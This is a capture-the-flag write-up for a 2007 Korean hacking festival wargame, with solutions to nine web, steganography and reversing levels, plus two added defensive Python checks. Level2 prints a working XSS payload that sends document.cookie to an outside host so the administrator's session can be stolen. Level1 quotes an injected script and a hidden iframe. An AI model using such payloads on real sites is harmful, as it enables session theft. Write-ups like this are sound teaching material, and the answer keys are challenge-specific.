argos hacking festival 2007

- Argos Hacking Festival 2007 -

2007. 1. 15~16

윤석언([email protected])

http://168.188.130.242/ahf2006/ (jhysu)

=================================== Level1

<center>
<a href=http://www.spidynamics.com/assets/documents/HackingFeeds.pdf><img src=../img/rss.jpg border=0></a><br>
<font color=#AAAAAA>위 그림을 클릭하시면 위 문서(PDF)를 다운받으실 수 있습니다.</font><br><br><script>alert('AHF2006 uses a rss feed, just for fun :D');</script>RSS/ATOM Feed Injection은 2006 데프콘에서 발표된 취약점입니다.<br>XSS 취약점이 아직 대부분의 RSS Reader 프로그램에서 존재합니다.<br>앞으로 이에 대한 주의가 필요하지 않을까싶네요^^<br><iframe src=./rss_password width=0 height=0>

=================================== Level 3

View source.

The default.css file is downloaded.

========================================== Level8

manlikessexygirl

========================================== Level7

Download the image... (badboys.gif)

Steganographic cipher.....

The file pwd.txt appears...

010 - 6479 - 6988 call me

Call the number and you are told the answer....

========================================== Level5

Google the URL of badboys.

========================================== Level6

View source on any page -> there are /css/embed.js and ~~.css; request that file on port 80 as shown below.

It is imported like this: import(ahf~~~).

# telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
http://168.188.130.242/ahf2006/css/embed.js
<font color=#ffffff><small>축하합니다! level6 정답입니다!</small></font><br><font color=#ffffff><small>패스워드는 HackTheFlashActionScript 입니다.</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>Connection closed by foreign host.

========================================== Level2

An XSS attack on the to.ahf2006 board does it.

Like this....

<script language=javascript>
window.open("http://xxx.xxx.xxx.xxx/~slaxcore/aa.php?cook="+document.cookie);</script>

Then, when the administrator reads the post, the cookie is saved to the path above.

Social_is_best_hacking
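Added example (not part of the original write-up): a small Python check that a feed reader or board could run on untrusted HTML before rendering it, covering the active markup seen in the Level1 page source (a script element and a zero-size iframe) and in the Level2 board post (a script reading document.cookie). The sample strings are constructed from the markup quoted on this page; the names scan and render_safe are assumptions of this example.

```python
from html import escape
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

# Constructed samples modelled on the markup quoted on this page.
FEED_ITEM = ("<b>AHF2006</b><script>alert('just for fun :D');</script>"
             "<iframe src=./rss_password width=0 height=0>")
BOARD_POST = ('<script language=javascript>window.open('
              '"http://xxx.xxx.xxx.xxx/~slaxcore/aa.php?cook="+document.cookie);</script>')

class ActiveContentFinder(HTMLParser):
    """Records markup that runs script or silently loads another resource."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        self._in_script = tag == "script"
        if tag in ACTIVE_TAGS:
            hidden = "0" in (attrs.get("width"), attrs.get("height"))
            self.findings.append(("hidden-" + tag if hidden else tag, attrs.get("src", "")))
        for name, value in attrs.items():
            if name.startswith("on"):
                self.findings.append(("event-handler", name))
            elif name in ("href", "src") and value.strip().lower().startswith("javascript:"):
                self.findings.append(("javascript-url", name))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and "document.cookie" in data:
            self.findings.append(("cookie-access", "document.cookie"))

def scan(fragment):
    """Return (kind, detail) findings for one untrusted HTML fragment."""
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings

def render_safe(fragment):
    """Output-encode the fragment so a reader or board shows it as text."""
    return escape(fragment, quote=True)
```

Detection is only a tripwire; the output encoding in render_safe, together with an HttpOnly session cookie, is what keeps a post like the Level2 one from reaching the administrator's cookie.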

========================================== Level4

View source, and the path below looks suspicious.. (~admin) ...

http://168.188.130.242/~admin/.bash_history (file path and file name found by guessing)

ll

echo "binish is handsome! :p"

vi css/default.css

cd main/

ll

vi head.php

cd ../img

ll

cd ../main/

ll

vi head.php

cd ..

ll

cd ..

ll

cd /usr/local/apache/htdocs/

ll

ll

cd css/

cd ..

ll

cd

ll

cd ahf2006/

ll

d main/

ll

cd main/

vi head.php

ll

mv udcsc.php contact.php

vi hoe

ll

echo "x15kangx is the new face of argos!"

vi head.php

vi tail.php

vi head.php

vi home.php

vi head.php

vi home.php

vi tail.php

vi home.php

vi head.php

vi tail.php

vi head.php

vi tail.php

vi head.php

vi home.php

vi head.php

vi tail.php

vi head.php

vi tail.php

vi home.php

vi head.php

vi home.php

vi head.php

vi home.php

vi tail.php

vi home.php

vi head.php

vi tail.php

vi home.php

vi head.php

vi tail.php

vi head.php

vi home.php

vi head.php

vi home.php

vi head.php

vi home.php

vi head.php

vi home.php

vi head.php

wget "http://sexy_site/ya_han_movie.avi"

vi home.php

ll

vi intro.php

vi ../join/join

vi ../join/join.php

vi level.php

vi ../board/board_list.php

vi head.php

vi contact.php

i home.php

vi home.php

vi head.php

ll

vi home.php

vi head.php

ll

vi ../board/board_list.php

vi contact.php

vi ../board/board_list.php

vi head.php

vi level.php

vi re

vi ../join/join.php

exit

x

cd ahf2006/

ll

cd main

ll

vi head.php

ll

vi default.css default.css

vi default.css

vi default.css

ll

cd ..

cd /home/admin/public_html/admin/

vi index.php

vi /usr/local/apache/conf/httpd.conf

/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin

/usr/local/apache/bin/apachectl restart

ll

cd main

ll

vi intro.php

vi intro.php

ll

vi member.php

ll

cd ..

The part in red above (the htpasswd line) is the part to look at closely....

ll

vi member.

vi member.php

ll

cd join

ll

cd ..

ll

cd css

vi default.css

ll

cd ..

ll

vi main/home.php

cd css/

ll

vi default.css

ll

cd ..

cd ..

ll

ll

cd ../dhf2006/

ll

vi main/home.php

vi main/head.php

cd

cd ahf2006/

ll

vi css/default.css

ll

pwd

cd ..
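Added example (not part of the original write-up): a Python audit a defender could run over a served directory to catch the two exposures visible in this level, a shell history file reachable under /~admin/ and a password file created by htpasswd -c inside public_html under the name auth. The sample tree, the hash value and the function names are constructed for this example.

```python
import os
import re
import tempfile

HISTORY_NAMES = {".bash_history", ".sh_history", ".zsh_history", ".mysql_history"}
# user:hash lines as written by htpasswd (apr1, bcrypt, {SHA}, or 13-char crypt).
HTPASSWD_LINE = re.compile(r"^[^:\s]+:(\$apr1\$|\$2[aby]\$|\{SHA\}|[./0-9A-Za-z]{13}$)")

def looks_like_htpasswd(path):
    """True when every non-empty line of the file is a user:hash entry."""
    try:
        with open(path, "r", errors="replace") as fh:
            lines = [ln.strip() for ln in fh.readlines()[:50] if ln.strip()]
    except OSError:
        return False
    return bool(lines) and all(HTPASSWD_LINE.match(ln) for ln in lines)

def audit_docroot(root):
    """Return sorted (relative path, reason) pairs for files that should not be served."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name in HISTORY_NAMES:
                findings.append((rel, "shell history"))
            elif looks_like_htpasswd(full):
                # Caught by content: a name like "auth" does not start with ".ht",
                # so a deny rule keyed on that prefix does not cover it.
                findings.append((rel, "htpasswd-style credentials"))
    return sorted(findings)

def demo():
    """Build a constructed public_html tree and audit it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            ".bash_history": "vi head.php\nexit\n",
            "auth": "admin:ab01CdEfGhIjk\n",   # constructed 13-char crypt value
            "index.php": "<?php echo 'ok'; ?>\n",
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return audit_docroot(root)

if __name__ == "__main__":
    print(demo())
```

Keeping the password file outside any served directory removes the second finding entirely, which is safer than relying on a filename-based deny rule.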

================================================= Level9

A problem of finding the sum of 2006 numbers through reversing.

004066F6 . 8D7424 20 LEA ESI,DWORD PTR SS:[ESP+20]
004066FA > 8B2E MOV EBP,DWORD PTR DS:[ESI]
004066FC . 03FD ADD EDI,EBP ; store the sum in edi
004066FE . 40 INC EAX
004066FF . 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00406703 . 50 PUSH EAX
00406704 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00406708 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040670D . 50 PUSH EAX
0040670E . E8 87430100 CALL AHF2006.0041AA9A
00406713 . 83C4 0C ADD ESP,0C
00406716 . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040671A . 68 70014300 PUSH AHF2006.00430170 ; 번째 값 : ("-th value :")
0040671F . E8 14930100 CALL AHF2006.0041FA38
00406724 55 PUSH EBP ; push edi (print the sum)
00406725 . 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
00406729 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040672E . 51 PUSH ECX
0040672F . E8 66430100 CALL AHF2006.0041AA9A
00406734 . 83C4 0C ADD ESP,0C
00406737 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040673B . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040673F . 52 PUSH EDX
00406740 . E8 1A930100 CALL AHF2006.0041FA5F
00406745 . 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
00406749 . 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
0040674D . 53 PUSH EBX
0040674E . 53 PUSH EBX
0040674F . 50 PUSH EAX
00406750 E8 B67A0100 CALL AHF2006.0041E20B
00406755 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
00406759 83C6 04 ADD ESI,4
0040675C 3D D6070000 CMP EAX,7D6
00406761 ^ 7C 97 JL SHORT AHF2006.004066FA
00406763 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]
00406767 . 889C24 801F00>MOV BYTE PTR SS:[ESP+1F80],BL

Change the push ebp above to push edi, save, exit, and run the program; the accumulated sums will then be printed. Hold down Enter and the sum of the 2006 numbers is printed soon after.

Alternatively, set a breakpoint on the lower part in the debugger and keep running; the sum will be stored in the edi register.

99366